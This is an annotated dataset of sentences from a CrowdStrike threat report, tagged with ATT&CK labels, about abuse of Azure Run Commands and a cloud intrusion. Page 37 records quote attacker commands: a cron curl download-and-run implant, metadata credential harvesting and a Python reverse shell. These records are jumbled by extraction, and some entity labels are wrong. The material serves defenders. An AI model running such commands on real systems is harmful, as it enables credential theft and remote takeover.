"crowdstrike-49_crowdstrike_report-p34-s398-731111", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 34, "sentence_id": 398, "context_before": "Run Commands are part of the default VM agent and legitimately used to manage Azure VMs.", "sentence_text": "Azure supports multiple versions of Windows and various distributions of Linux.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p34-s399-538954", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 34, "sentence_id": 399, "context_before": "Azure supports multiple versions of Windows and various distributions of Linux.", "sentence_text": "Azure Run Commands similarly support both operating systems.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p34-s400-108046", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 34, "sentence_id": 400, "context_before": "Azure Run Commands similarly support both operating systems.", "sentence_text": "Azure Run Commands can be executed in several ways, including from the Azure Portal, Azure REST API, Azure Command-Line Interface (CLI) and through PowerShell on an Azure VM.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p34-s401-684df6", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 34, "sentence_id": 401, "context_before": "Azure Run Commands can be executed in several ways, including from the Azure Portal, Azure REST API, Azure Command-Line Interface (CLI) and through PowerShell on an Azure VM.", "sentence_text": "An adversary can use Azure Run Commands to execute with elevated privileges — PowerShell scripts on a Windows VM run as SYSTEM, and shell scripts on a Linux VM run as root.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0004", "name": "Privilege Escalation" } ], "techniques": [ { "id": "T1068", "name": "Exploitation for Privilege Escalation" }, { "id": "T1059.001", "name": "PowerShell" }, { "id": "T1059.004", "name": "Unix Shell" } ], "procedure": "adversaries use azure run commands to execute shell commands on systems with elevated privileges", "entities": [ { "text": "adversary ", "start": 3, "end": 13, "label": "MalwareTool" }, { "text": "use Azure Run Commands", "start": 17, "end": 39, "label": "Action" }, { "text": "execute with elevated privileges", "start": 43, "end": 75, "label": "Action" }, { "text": "PowerShell scripts", "start": 78, "end": 96, "label": "MalwareTool" }, { "text": "shell scripts", "start": 132, "end": 145, "label": "MalwareTool" }, { "text": "Windows VM run as SYSTEM", "start": 102, "end": 126, "label": "Infrastructure_Indicator" }, { "text": "Linux VM run as root", "start": 151, "end": 171, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p34-s402-d2b922", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 34, "sentence_id": 402, "context_before": "An adversary can use Azure Run Commands to execute with elevated privileges — PowerShell scripts on a Windows VM run as SYSTEM, and shell scripts on a Linux VM run as root.", "sentence_text": "This creates potential for remote execution, lateral movement and privilege escalation, as such permissions to execute Azure Run Commands must be tightly controlled and closely monitored for any changes.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p34-s403-34c06a", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 34, "sentence_id": 403, "context_before": "This creates potential for remote execution, lateral movement and privilege escalation, as such permissions to execute Azure Run Commands must be tightly controlled and closely monitored for any changes.", "sentence_text": "Adversaries are actively exploiting this feature in Azure.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.009", "name": "Cloud API" } ], "procedure": "adversaries are exploiting azure features", "entities": [ { "text": "Adversaries ", "start": 0, "end": 12, "label": "MalwareTool" }, { "text": "are actively exploiting", "start": 12, "end": 35, "label": "Action" }, { "text": "Azure", "start": 52, "end": 57, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p34-s404-54655f", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 34, "sentence_id": 404, "context_before": "Adversaries are actively exploiting this feature in Azure.", "sentence_text": "In one example, Falcon OverWatch observed SCATTERED SPIDER execute a PowerShell script via the RunPowerShellScript command to deploy an RMM binary to a set of Azure VMs.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1059.009", "name": "Cloud API" }, { "id": "T1219", "name": "Remote Access Tools" } ], "procedure": "SCATTERED SPIDER executed a powershell script to deploy RMM", "entities": [ { "text": "SCATTERED SPIDER", "start": 42, "end": 58, "label": "ThreatActor" }, { "text": "PowerShell script", "start": 69, "end": 86, "label": "MalwareTool" }, { "text": "execute", "start": 59, "end": 66, "label": "Action" }, { "text": "to deploy", "start": 123, "end": 132, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p34-s405-01f602", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 34, "sentence_id": 405, "context_before": "In one example, Falcon OverWatch observed SCATTERED SPIDER execute a PowerShell script via the RunPowerShellScript command to deploy an RMM binary to a set of Azure VMs.", "sentence_text": "Falcon OverWatch also observed adversaries attempting to use the technique to deploy RMM binaries and other tools across Linux VMs.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1219", "name": "Remote Access Tools" }, { "id": "T1059.009", "name": "Cloud API" } ], "procedure": "adversaries attempt to deploy RMM and other tools across linux VMs", "entities": [ { "text": "adversaries ", "start": 31, "end": 43, "label": "MalwareTool" }, { "text": "use", "start": 57, "end": 60, "label": "Action" }, { "text": "deploy RMM", "start": 78, "end": 88, "label": "Action" }, { "text": "RMM ", "start": 85, "end": 89, "label": "MalwareTool" }, { "text": "Linux VMs", "start": 121, "end": 130, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p34-s406-8dab47", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 34, "sentence_id": 406, "context_before": "Falcon OverWatch also observed adversaries attempting to use the technique to deploy RMM binaries and other tools across Linux VMs.", "sentence_text": "To date, Falcon OverWatch has observed Azure Run Commands used primarily in attempts to deploy tooling across a victim environment.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1059.009", "name": "Cloud API" }, { "id": "T1021", "name": "Remote Services" } ], "procedure": "run commands used to deploy tooling across victim environment", "entities": [ { "text": "used", "start": 58, "end": 62, "label": "Action" }, { "text": "in attempts to deploy", "start": 73, "end": 94, "label": "Action" }, { "text": "victim environment", "start": 112, "end": 130, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p35-s407-d4dbbf", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 35, "sentence_id": 407, "context_before": "To date, Falcon OverWatch has observed Azure Run Commands used primarily in attempts to deploy tooling across a victim environment.", "sentence_text": "NOWHERE TO HIDE 35 Defensive Countermeasures Know where to look for trouble.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p35-s408-8d511f", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 35, "sentence_id": 408, "context_before": "NOWHERE TO HIDE 35 Defensive Countermeasures Know where to look for trouble.", "sentence_text": "If malicious activity is suspected, the following locations are relevant for defenders to understand what is occuring.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p35-s409-06a626", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 35, "sentence_id": 409, "context_before": "If malicious activity is suspected, the following locations are relevant for defenders to understand what is occuring.", "sentence_text": "For Azure Windows VMs, downloaded scripts will be placed in the following directories for execution:\nC:\\Packages\\Plugins\\Microsoft.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p35-s412-4fedd2", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 35, "sentence_id": 412, "context_before": "Core.", "sentence_text": "RunCommandWindows\\\\Downloads\\\nOutput from the execution of the scripts can be found in a similar location:\nC:\\Packages\\Plugins\\Microsoft.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p35-s415-eaa072", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 35, "sentence_id": 415, "context_before": "Core.", "sentence_text": "RunCommandWindows\\\\Status\\", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p35-s416-73f2f2", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 35, "sentence_id": 416, "context_before": "RunCommandWindows\\\\Status\\", "sentence_text": "For Azure Linux VMs, both the downloaded scripts and the execution output (stdout and stderr) will be written in the same directory:\n/var/lib/waagent/run-command/download/\nUnderstand the core functionality of the cloud platforms you’re running.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p35-s417-5f09c5", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 35, "sentence_id": 417, "context_before": "For Azure Linux VMs, both the downloaded scripts and the execution output (stdout and stderr) will be written in the same directory:\n/var/lib/waagent/run-command/download/\nUnderstand the core functionality of the cloud platforms you’re running.", "sentence_text": "Cloud-conscious adversaries will continue to seek new ways to use legitimate features of Azure management and orchestration in support of their malicious objectives.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p35-s418-9aa2d4", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 35, "sentence_id": 418, "context_before": "Cloud-conscious adversaries will continue to seek new ways to use legitimate features of Azure management and orchestration in support of their malicious objectives.", "sentence_text": "Falcon OverWatch encourages all defenders to dig deeper into the technology and fully understand the environments for which they are responsible.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p35-s419-3c2af8", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 35, "sentence_id": 419, "context_before": "Falcon OverWatch encourages all defenders to dig deeper into the technology and fully understand the environments for which they are responsible.", "sentence_text": "You can find additional resources on the CrowdStrike Falcon® Cloud Security website32 to help with this journey.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p35-s420-f70a6f", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 35, "sentence_id": 420, "context_before": "You can find additional resources on the CrowdStrike Falcon® Cloud Security website32 to help with this journey.", "sentence_text": "For more cloud security resources, visit https://www.crowdstrike.com/products/cloud-security/.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p36-s421-5ac397", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 36, "sentence_id": 421, "context_before": "For more cloud security resources, visit https://www.crowdstrike.com/products/cloud-security/.", "sentence_text": "NOWHERE TO HIDE 36 Compromised Cloud Credentials Facilitate Widespread Lateral Movement Cloud-conscious adversaries are keenly aware of how to leverage cloud tooling and services that are available to them once they gain an initial foothold into a victim’s environment.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": null, "procedure": "Leverage available cloud tooling and services after gaining an initial foothold into a victim environment.", "entities": [ { "text": "Cloud-conscious adversaries", "start": 88, "end": 115, "label": "ThreatActor" }, { "text": "leverage cloud tooling and services", "start": 143, "end": 178, "label": "Action" }, { "text": "gain an initial foothold", "start": 216, "end": 240, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p36-s422-88aeb0", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 36, "sentence_id": 422, "context_before": "NOWHERE TO HIDE 36 Compromised Cloud Credentials Facilitate Widespread Lateral Movement Cloud-conscious adversaries are keenly aware of how to leverage cloud tooling and services that are available to them once they gain an initial foothold into a victim’s environment.", "sentence_text": "This is analogous to a traditional on-premises compromise, during which an adversary may use one of the many already installed tools — aka “living off the land” binaries and scripts (LOLBAS) — to further their objectives.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p36-s423-9a2dd3", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 36, "sentence_id": 423, "context_before": "This is analogous to a traditional on-premises compromise, during which an adversary may use one of the many already installed tools — aka “living off the land” binaries and scripts (LOLBAS) — to further their objectives.", "sentence_text": "The following intrusion demonstrates the adversary TTPs used to pivot from on-premises devices to cloud infrastructure.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p36-s424-a1d784", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 36, "sentence_id": 424, "context_before": "The following intrusion demonstrates the adversary TTPs used to pivot from on-premises devices to cloud infrastructure.", "sentence_text": "In early 2023, Falcon OverWatch detected an adversary exploiting a custom PHP web application at a North American customer in the retail sector.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "adversary exploiting a web application", "entities": [ { "text": "adversary ", "start": 44, "end": 54, "label": "MalwareTool" }, { "text": "exploiting ", "start": 54, "end": 65, "label": "Action" }, { "text": "custom PHP web application", "start": 67, "end": 93, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p36-s425-2cbaa1", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 36, "sentence_id": 425, "context_before": "In early 2023, Falcon OverWatch detected an adversary exploiting a custom PHP web application at a North American customer in the retail sector.", "sentence_text": "By leveraging a RCE vulnerability, the adversary was able to gain unauthorized access to the underlying system.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "adversary gained unauthorized access", "entities": [ { "text": "adversary ", "start": 39, "end": 49, "label": "MalwareTool" }, { "text": "gain unauthorized access", "start": 61, "end": 85, "label": "Action" }, { "text": "underlying system.", "start": 93, "end": 111, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p36-s426-4a217e", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 36, "sentence_id": 426, "context_before": "By leveraging a RCE vulnerability, the adversary was able to gain unauthorized access to the underlying system.", "sentence_text": "Once inside, they proceeded to harvest cloud service provider credentials.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1552.005", "name": "Cloud Instance Metadata API" } ], "procedure": "adversary harvests cloud credentials", "entities": [ { "text": " harvest cloud service provider credentials", "start": 30, "end": 73, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p36-s427-ece9e9", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 36, "sentence_id": 427, "context_before": "Once inside, they proceeded to harvest cloud service provider credentials.", "sentence_text": "Using these newly found credentials, the adversary began to move laterally in the victim’s environment using the cloud service provider’s system manager.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0007", "name": "Discovery" }, { "id": "TA0008", "name": "Lateral Movement" }, { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1021.001", "name": "Remote Desktop Protocol" }, { "id": "T1059.009", "name": "Cloud API" } ], "procedure": "adversary moves laterally in victim's environment", "entities": [ { "text": "adversary ", "start": 41, "end": 51, "label": "MalwareTool" }, { "text": "move laterally", "start": 60, "end": 74, "label": "Action" }, { "text": "victim’s environment", "start": 82, "end": 102, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p36-s428-c13da5", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 36, "sentence_id": 428, "context_before": "Using these newly found credentials, the adversary began to move laterally in the victim’s environment using the cloud service provider’s system manager.", "sentence_text": "This maneuver allowed the adversary to extend their reach to compromise additional resources and embed deeper into the victim’s environment.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p36-s429-dbedde", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 36, "sentence_id": 429, "context_before": "This maneuver allowed the adversary to extend their reach to compromise additional resources and embed deeper into the victim’s environment.", "sentence_text": "Defensive Countermeasures\nIdentify and manage vulnerabilities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p36-s430-c19a9b", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 36, "sentence_id": 430, "context_before": "Defensive Countermeasures\nIdentify and manage vulnerabilities.", "sentence_text": "Regularly monitor cloud assets and applications for vulnerabilities, and patch or otherwise address identified risks in a timely manner.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p36-s431-ca6c5e", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 36, "sentence_id": 431, "context_before": "Regularly monitor cloud assets and applications for vulnerabilities, and patch or otherwise address identified risks in a timely manner.", "sentence_text": "Vulnerable internet-facing cloud assets, in particular, are at risk of facilitating initial access for adversaries.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p36-s432-3376ad", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 36, "sentence_id": 432, "context_before": "Vulnerable internet-facing cloud assets, in particular, are at risk of facilitating initial access for adversaries.", "sentence_text": "Consider adopting cloud workload protection (CWP) solutions that offer continuous vulnerability management in addition to endpoint detection and response (EDR)\nand other runtime protections at both the cloud virtual machine and container levels.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p36-s433-612ff3", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 36, "sentence_id": 433, "context_before": "Consider adopting cloud workload protection (CWP) solutions that offer continuous vulnerability management in addition to endpoint detection and response (EDR)\nand other runtime protections at both the cloud virtual machine and container levels.", "sentence_text": "Secure from start to finish.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p36-s434-3ce16c", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 36, "sentence_id": 434, "context_before": "Secure from start to finish.", "sentence_text": "Cloud resource configurations should be standardized and validated prior to deployment, and thereafter constantly monitored for deviations from approved standards.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p36-s435-344798", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 36, "sentence_id": 435, "context_before": "Cloud resource configurations should be standardized and validated prior to deployment, and thereafter constantly monitored for deviations from approved standards.", "sentence_text": "Secure configurations prevent access to sensitive resources by unauthorized entities, reducing the likelihood of success of follow-on tactics such as privilege escalation, lateral movement and data collection.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p37-s436-3b6376", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 37, "sentence_id": 436, "context_before": "Secure configurations prevent access to sensitive resources by unauthorized entities, reducing the likelihood of success of follow-on tactics such as privilege escalation, lateral movement and data collection.", "sentence_text": "NOWHERE TO HIDE NOWHERE TO HIDE 3737 Initial Access", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p37-s437-aa67b4", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 37, "sentence_id": 437, "context_before": "NOWHERE TO HIDE NOWHERE TO HIDE 3737 Initial Access", "sentence_text": "The adversary exploited an RCE vulnerability that existed in a custom PHP application running on multiple Linux servers hosted in the victim organization's Cloud Service Provider Persistence environment.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "adversary exploited RCE vulnerability", "entities": [ { "text": "adversary ", "start": 4, "end": 14, "label": "MalwareTool" }, { "text": "exploited ", "start": 14, "end": 24, "label": "Action" }, { "text": "custom PHP application running on multiple Linux servers hosted in the victim organization's Cloud Service Provider Persistence environment.", "start": 63, "end": 203, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p37-s438-b95681", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 37, "sentence_id": 438, "context_before": "The adversary exploited an RCE vulnerability that existed in a custom PHP application running on multiple Linux servers hosted in the victim organization's Cloud Service Provider Persistence environment.", "sentence_text": "A cron job was created to download and run the Silver implant upon reboot.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1053.003", "name": "Cron" } ], "procedure": "created a cron job to download and execute the Silver implant upon reboot", "entities": [ { "text": "cron job", "start": 2, "end": 10, "label": "Infrastructure_Indicator" }, { "text": "Silver implant", "start": 47, "end": 61, "label": "MalwareTool" }, { "text": "was created to download and run the Silver implant upon reboot", "start": 11, "end": 73, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p37-s439-238ec9", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 37, "sentence_id": 439, "context_before": "A cron job was created to download and run the Silver implant upon reboot.", "sentence_text": "Silver is an open-source cross-platform adversary emulation/red team framework.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p37-s440-4a71ce", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 37, "sentence_id": 440, "context_before": "Silver is an open-source cross-platform adversary emulation/red team framework.", "sentence_text": "Credential Access /var/spool/cron/crontabs/root:4:@reboot curl The adversary attempted to harvest Cloud Service hxxp://", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1552.005", "name": "Cloud Instance Metadata API" } ], "procedure": "adversary tries to harvest cloud service", "entities": [ { "text": "adversary ", "start": 67, "end": 77, "label": "MalwareTool" }, { "text": "attempted to harvest", "start": 77, "end": 97, "label": "Infrastructure_Indicator" }, { "text": "Cloud Service", "start": 98, "end": 111, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p37-s441-ab3ad1", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 37, "sentence_id": 441, "context_before": "Credential Access /var/spool/cron/crontabs/root:4:@reboot curl The adversary attempted to harvest Cloud Service hxxp://", "sentence_text": "[REDACTED IPAddress]:8443/.tmpfs.cache Provider credentials via the AWS Instance Metadata -o/dev/shm/tmpfs.cache; chmod +x/dev/shm/.\nServices API.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": null, "procedure": "The adversary attempted to harvest cloud provider credentials via the AWS Instance Metadata Service using curl.", "entities": [ { "text": "chmod +x/dev/shm/.", "start": 114, "end": 132, "label": "Action" }, { "text": "AWS Instance Metadata", "start": 68, "end": 89, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p37-s442-53c81b", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 37, "sentence_id": 442, "context_before": "[REDACTED IPAddress]:8443/.tmpfs.cache Provider credentials via the AWS Instance Metadata -o/dev/shm/tmpfs.cache; chmod +x/dev/shm/.\nServices API.", "sentence_text": "tmpfs.cache;bash -c \"exec -a '[kthread/4:3- bus]' /dev/shm/.tmpfs.cahce\" & disown curl -k http://169.254.169[.]254/latest/ meta-data/iam/security-credentials/ curl hxxp://[REDACTED ExternalIPAddress]/", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p37-s443-c85907", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 37, "sentence_id": 443, "context_before": "tmpfs.cache;bash -c \"exec -a '[kthread/4:3- bus]' /dev/shm/.tmpfs.cahce\" & disown curl -k http://169.254.169[.]254/latest/ meta-data/iam/security-credentials/ curl hxxp://[REDACTED ExternalIPAddress]/", "sentence_text": "[REDACTED FileName] -o /dev/shm/[REDACTED curl -k http://169.254.169[.]254/latest/ Filename] -a chmod +x /dev/shm/[REDACTED meta-data/iam/security-credentials/ Filename] bash -c \"exec -a '[kworker/4:3- [REDACTED IAMRole]\nevents] /dev/shm/[REDACTED FileName]\" Discovery Various discovery commands were executed, Command and Control including attempts to view potentially sensitive The adversary leveraged SSM Orchestration in an information.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1082", "name": "System Information Discovery" }, { "id": "T1059.009", "name": "Cloud API" } ], "procedure": "discovery commands executed", "entities": [ { "text": "discovery commands were executed", "start": 277, "end": 309, "label": "Action" }, { "text": "SSM Orchestration", "start": 404, "end": 421, "label": "Infrastructure_Indicator" }, { "text": "adversary ", "start": 384, "end": 394, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p37-s444-1fee21", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 37, "sentence_id": 444, "context_before": "[REDACTED FileName] -o /dev/shm/[REDACTED curl -k http://169.254.169[.]254/latest/ Filename] -a chmod +x /dev/shm/[REDACTED meta-data/iam/security-credentials/ Filename] bash -c \"exec -a '[kworker/4:3- [REDACTED IAMRole]\nevents] /dev/shm/[REDACTED FileName]\" Discovery Various discovery commands were executed, Command and Control including attempts to view potentially sensitive The adversary leveraged SSM Orchestration in an information.", "sentence_text": "attempt to execute multiple Python reverse shells.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.006", "name": "Command and Scripting Interpreter: Python" } ], "procedure": "executing python reverse shells", "entities": [ { "text": "execute", "start": 11, "end": 18, "label": "Action" }, { "text": "Python reverse shells", "start": 28, "end": 49, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p37-s446-d47c47", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 37, "sentence_id": 446, "context_before": "cat .", "sentence_text": "bash_history, cat .env", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p37-s447-d7d4f3", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 37, "sentence_id": 447, "context_before": "bash_history, cat .env", "sentence_text": "Cloud-conscious discovery included querying the socket(); s.connect ((\"[REDACTED AWS Instance Metadata Service API to enumerate IPAddress]\", [REDACTED PORT]));", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p37-s448-09451e", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 37, "sentence_id": 448, "context_before": "Cloud-conscious discovery included querying the socket(); s.connect ((\"[REDACTED AWS Instance Metadata Service API to enumerate IPAddress]\", [REDACTED PORT]));", "sentence_text": "[os.\nIAM roles.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p37-s449-158b7a", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 37, "sentence_id": 449, "context_before": "[os.\nIAM roles.", "sentence_text": "dup2 (s.fileno(),f)for f in(0,1,2)]; pty.\nspawn(\"sh\")\ncurl -k http://169.254.169[.]254/latest/ meta-data/iam/security-credentials/ The adversary also used curl during the intrusion to [REDACTED IAMRole] ingress the Silver implant.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Used curl to ingress the Silver implant during the intrusion.", "entities": [ { "text": "adversary", "start": 135, "end": 144, "label": "ThreatActor" }, { "text": "curl", "start": 155, "end": 159, "label": "MalwareTool" }, { "text": "the Silver implant", "start": 211, "end": 229, "label": "MalwareTool" }, { "text": "used curl during the intrusion to [REDACTED IAMRole] ingress the Silver implant", "start": 150, "end": 229, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p37-s450-c38c9e", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 37, "sentence_id": 450, "context_before": "dup2 (s.fileno(),f)for f in(0,1,2)]; pty.\nspawn(\"sh\")\ncurl -k http://169.254.169[.]254/latest/ meta-data/iam/security-credentials/ The adversary also used curl during the intrusion to [REDACTED IAMRole] ingress the Silver implant.", "sentence_text": "curl hxxp://[REDACTED ExternalIPAddress]/", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p37-s451-261c3e", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 37, "sentence_id": 451, "context_before": "curl hxxp://[REDACTED ExternalIPAddress]/", "sentence_text": "[REDACTED FileName]", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p37-s452-5206bf", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 37, "sentence_id": 452, "context_before": "[REDACTED FileName]", "sentence_text": "-o /dev/shm/[REDACTED FileName] -a", 